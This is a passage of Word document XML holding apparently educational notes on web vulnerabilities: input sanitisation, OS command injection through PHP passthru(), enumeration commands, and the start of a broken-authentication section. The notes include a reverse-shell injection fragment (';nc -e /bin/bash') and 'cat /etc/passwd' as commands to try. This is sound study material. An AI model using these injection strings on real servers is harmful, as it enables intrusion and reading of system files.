    <w:p w14:paraId="35F730A7" w14:textId="38E86DE4" w:rsidR="00075B94" w:rsidRPr="0084205E" w:rsidRDefault="00075B94" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Using an allow list – safe inputs or characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CC86AA" w14:textId="7DC0B5DD" w:rsidR="00075B94" w:rsidRPr="0084205E" w:rsidRDefault="00075B94" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Stripping input – dangerous characters are removed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650DCD34" w14:textId="55952CFE" w:rsidR="00075B94" w:rsidRPr="0084205E" w:rsidRDefault="009C4DB1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>OS Command injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EBF3D3" w14:textId="20D56463" w:rsidR="009C4DB1" w:rsidRPr="0084205E" w:rsidRDefault="009C4DB1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Occurs when server-side code, such as PHP, in a web application makes a system call on the hosting machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3578E862" w14:textId="4F4C98C7" w:rsidR="009C4DB1" w:rsidRPr="0084205E" w:rsidRDefault="009C4DB1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Allows attacker to take advantage of made system call to execute OS commands on server</w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="488DFD15" w14:textId="6DB34F76" w:rsidR="009C4DB1" w:rsidRPr="0084205E" w:rsidRDefault="009C4DB1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Spawn reverse shells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FC6405" w14:textId="59AB30C7" w:rsidR="009C4DB1" w:rsidRPr="0084205E" w:rsidRDefault="009C4DB1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177B2EB8" w14:textId="2D977435" w:rsidR="009C4DB1" w:rsidRPr="0084205E" w:rsidRDefault="009C4DB1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Active Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643CC14F" w14:textId="584E4CBC" w:rsidR="009C4DB1" w:rsidRPr="0084205E" w:rsidRDefault="001A4881" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Blind command injection occurs when the system command made to server does not return response to user in HTML document</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE2B637" w14:textId="3B74A629" w:rsidR="001A4881" w:rsidRPr="0084205E" w:rsidRDefault="001A4881" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Active command injection will return the response to the user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05173A01" w14:textId="01C4630B" w:rsidR="001A4881" w:rsidRPr="0084205E" w:rsidRDefault="001A4881" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Made visible through several HTML elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6618562A" w14:textId="7E8869C6" w:rsidR="001A4881" w:rsidRPr="0084205E" w:rsidRDefault="001A4881" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>A sample code would check is a command string is set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524EBE40" w14:textId="1A009F81" w:rsidR="001A4881" w:rsidRPr="0084205E" w:rsidRDefault="001A4881" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>If it is set, then the variable of the command string is passed to the input field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F3D96D" w14:textId="620C51BC" w:rsidR="001A4881" w:rsidRPr="0084205E" w:rsidRDefault="001A4881" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>passthru</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">) function, </w:t>
      </w:r>
      <w:r w:rsidR="000667AA" w:rsidRPr="0084205E">
        <w:t>the code executes what gets entered into the input then passing output directly back to browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA8972E" w14:textId="62EE5B07" w:rsidR="000667AA" w:rsidRPr="0084205E" w:rsidRDefault="000667AA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>If it isn’t set, error is output to the page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D27117A" w14:textId="74790178" w:rsidR="000667AA" w:rsidRPr="0084205E" w:rsidRDefault="000667AA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>WAYS TO DETECT ACTIVE COMMAND INJECTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613A446A" w14:textId="6FF4C5A0" w:rsidR="000667AA" w:rsidRPr="0084205E" w:rsidRDefault="000667AA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>See response from system call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4E7EF8" w14:textId="58B6FE50" w:rsidR="000667AA" w:rsidRPr="0084205E" w:rsidRDefault="000667AA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Ex. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Passthru</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>) function in PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F47199A" w14:textId="359669EC" w:rsidR="000667AA" w:rsidRPr="0084205E" w:rsidRDefault="000667AA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Response passed directly to document</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666A4EEF" w14:textId="72E29469" w:rsidR="000667AA" w:rsidRPr="0084205E" w:rsidRDefault="000667AA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Can be used to enumerate machine further</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796472A2" w14:textId="4FBA4F49" w:rsidR="000667AA" w:rsidRPr="0084205E" w:rsidRDefault="000667AA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Commands to try</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3980944A" w14:textId="1B636926" w:rsidR="000667AA" w:rsidRPr="0084205E" w:rsidRDefault="000667AA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC596B8" w14:textId="5A58E2FC" w:rsidR="000667AA" w:rsidRPr="0084205E" w:rsidRDefault="000667AA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008528CB" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FED1C2" w14:textId="56443666" w:rsidR="008528CB" w:rsidRPr="0084205E" w:rsidRDefault="008528CB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/passwd – user list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E7C5B1" w14:textId="77B388C7" w:rsidR="008528CB" w:rsidRPr="0084205E" w:rsidRDefault="008528CB" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Cross reference with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> output to determine </w:t>
      </w:r>
      <w:r w:rsidR="00AE7BAE" w:rsidRPr="0084205E">
        <w:t>user shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D388BEE" w14:textId="6EC86C7F" w:rsidR="000667AA" w:rsidRPr="0084205E" w:rsidRDefault="000667AA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AC1741" w14:textId="67E6CB15" w:rsidR="000667AA" w:rsidRPr="0084205E" w:rsidRDefault="000667AA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ifconfig/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1C09C12B" w14:textId="040241BA" w:rsidR="000667AA" w:rsidRPr="0084205E" w:rsidRDefault="000667AA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A03BF5" w14:textId="3207AF46" w:rsidR="000667AA" w:rsidRPr="0084205E" w:rsidRDefault="000667AA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ps -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1F15B618" w14:textId="3D933494" w:rsidR="000667AA" w:rsidRPr="0084205E" w:rsidRDefault="000667AA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5354D606" w14:textId="006BCB4C" w:rsidR="00AE7BAE" w:rsidRPr="0084205E" w:rsidRDefault="00AE7BAE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Lsb_release</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -a – find OS version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080B6BE5" w14:textId="693784F7" w:rsidR="000667AA" w:rsidRPr="0084205E" w:rsidRDefault="000667AA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F4E9ED" w14:textId="43FA2E90" w:rsidR="000667AA" w:rsidRPr="0084205E" w:rsidRDefault="000667AA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5254035A" w14:textId="43F0A4C2" w:rsidR="000667AA" w:rsidRPr="0084205E" w:rsidRDefault="000667AA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB142E9" w14:textId="2E284BAE" w:rsidR="000667AA" w:rsidRPr="0084205E" w:rsidRDefault="000667AA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513CA5BA" w14:textId="481AC942" w:rsidR="000667AA" w:rsidRPr="0084205E" w:rsidRDefault="000667AA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Tasklist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="696CD9AD" w14:textId="3E560CA3" w:rsidR="000667AA" w:rsidRPr="0084205E" w:rsidRDefault="000667AA" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Netstat -an</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062FA010" w14:textId="7A6C9064" w:rsidR="00833981" w:rsidRPr="0084205E" w:rsidRDefault="00833981" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Broken Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EC3FA5" w14:textId="5E524E5B" w:rsidR="00833981" w:rsidRPr="0084205E" w:rsidRDefault="00833981" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Authentication and session management constitute core components of modern web applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1694E81B" w14:textId="360AD73D" w:rsidR="00833981" w:rsidRPr="0084205E" w:rsidRDefault="00833981" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Username and password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F01819" w14:textId="321C6049" w:rsidR="00833981" w:rsidRPr="0084205E" w:rsidRDefault="00833981" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE4F3F8" w14:textId="67422330" w:rsidR="00833981" w:rsidRPr="0084205E" w:rsidRDefault="00833981" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Common flaws in authentication mechanisms include</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4CCB91" w14:textId="462667FE" w:rsidR="00833981" w:rsidRPr="0084205E" w:rsidRDefault="00833981" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Brute force attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7059D5" w14:textId="6B491E20" w:rsidR="00833981" w:rsidRPr="0084205E" w:rsidRDefault="00833981" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
